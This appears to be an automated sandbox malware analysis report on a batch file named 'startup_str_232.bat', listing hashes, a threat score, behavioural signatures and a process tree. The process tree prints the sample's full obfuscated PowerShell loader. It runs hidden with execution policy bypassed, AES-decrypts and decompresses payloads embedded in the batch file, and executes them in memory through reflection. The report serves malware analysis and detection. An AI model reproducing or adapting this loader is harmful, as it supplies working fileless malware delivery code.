Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
11-02-2025 11:23
Static task
static1
Behavioral task
behavioral1
Sample
startup_str_232.bat
Resource
win7-20241010-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
startup_str_232.bat
Resource
win10v2004-20250207-en
26 signatures
150 seconds
General
-
Target
startup_str_232.bat
-
Size
1.8MB
-
MD5
d7c48a5173ca5bc25644c9799109c835
-
SHA1
8845470e96cf21d7ff11961d3dd370787960dc22
-
SHA256
39b6ba1d146867517cb7772b4a9665bf9139319dcb9e01ebb584ddab9daf54a8
-
SHA512
e6a9e4d84ae1609ce511ba346faac33023e5ed3217a5c082be69ef18378ae3498153659aeeb506d2100c696cb50d329e6c2c24d4233c2b1f9442a5c59293a939
-
SSDEEP
24576:va3qjALWb5fJ3LTbHrDt9uwqPffkE8s706cW4DNTfWihRFxwVyU6fmD7+P+XbCBe:y6ALi5fdLT1qPHlovRciV+VLkrWy4hx
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2564 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3032 wrote to memory of 2564 3032 cmd.exe 32 PID 3032 wrote to memory of 2564 3032 cmd.exe 32 PID 3032 wrote to memory of 2564 3032 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\startup_str_232.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Gfr4+zeD+/eWhB2QAGtJiORh9A6UOWX3etZcAfnNQuY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z4PHG4bhLDvAXMFT9uGv8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZgiJx=New-Object System.IO.MemoryStream(,$param_var); $nEiVV=New-Object System.IO.MemoryStream; $YutHx=New-Object System.IO.Compression.GZipStream($ZgiJx, [IO.Compression.CompressionMode]::Decompress); $YutHx.CopyTo($nEiVV); $YutHx.Dispose(); $ZgiJx.Dispose(); $nEiVV.Dispose(); $nEiVV.ToArray();}function execute_function($param_var,$param2_var){ $opAvX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QPQSI=$opAvX.EntryPoint; $QPQSI.Invoke($null, $param2_var);}$knrmS = 'C:\Users\Admin\AppData\Local\Temp\startup_str_232.bat';$host.UI.RawUI.WindowTitle = $knrmS;$zAhSA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($knrmS).Split([Environment]::NewLine);foreach ($giYxD in $zAhSA) { if ($giYxD.StartsWith(':: ')) { $iOpvd=$giYxD.Substring(3); break; }}$payloads_var=[string[]]$iOpvd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-